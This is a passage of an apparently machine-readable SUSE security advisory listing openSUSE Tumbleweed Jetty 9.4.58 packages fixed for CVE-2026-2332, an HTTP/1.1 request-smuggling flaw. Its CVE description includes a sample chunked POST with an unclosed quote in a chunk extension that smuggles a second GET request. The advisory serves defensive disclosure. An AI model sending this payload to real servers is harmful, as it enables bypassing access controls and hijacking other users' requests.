"name": "jetty-util-ajax-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-util-ajax-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-webapp-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-webapp-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-webapp-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-webapp-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-webapp-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.s390x"
},
"product_reference": "jetty-webapp-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-webapp-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-webapp-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-xml-9.4.58-4.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.aarch64"
},
"product_reference": "jetty-xml-9.4.58-4.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-xml-9.4.58-4.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.ppc64le"
},
"product_reference": "jetty-xml-9.4.58-4.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-xml-9.4.58-4.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.s390x"
},
"product_reference": "jetty-xml-9.4.58-4.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jetty-xml-9.4.58-4.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.x86_64"
},
"product_reference": "jetty-xml-9.4.58-4.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-2332",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-2332"
}
],
"notes": [
{
"category": "general",
"text": "In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the \"funky chunks\" techniques outlined here:\n * https://w4ke.info/2025/06/18/funky-chunks.html\n\n * https://w4ke.info/2025/10/29/funky-chunks-2.html\n\n\nJetty terminates chunk extension parsing at \\r\\n inside quoted strings instead of treating this as an error.\n\n\nPOST / HTTP/1.1\nHost: localhost\nTransfer-Encoding: chunked\n\n1;ext=\"val\nX\n0\n\nGET /smuggled HTTP/1.1\n...\n\n\n\n\n\nNote how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-2332",
"url": "https://www.suse.com/security/cve/CVE-2026-2332"
},
{
"category": "external",
"summary": "SUSE Bug 1262115 for CVE-2026-2332",
"url": "https://bugzilla.suse.com/1262115"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-server-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlet-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-servlets-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-start-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-util-ajax-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-webapp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-xml-9.4.58-4.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-client-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-io-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-plus-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-project-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-proxy-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-quickstart-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.aarch64",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.ppc64le",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.s390x",
"openSUSE Tumbleweed:jetty-rewrite-9.4.58-4.1.x86_64",
"openSUSE Tumbleweed:jetty-security-9.4.58-4.1.aarch64",
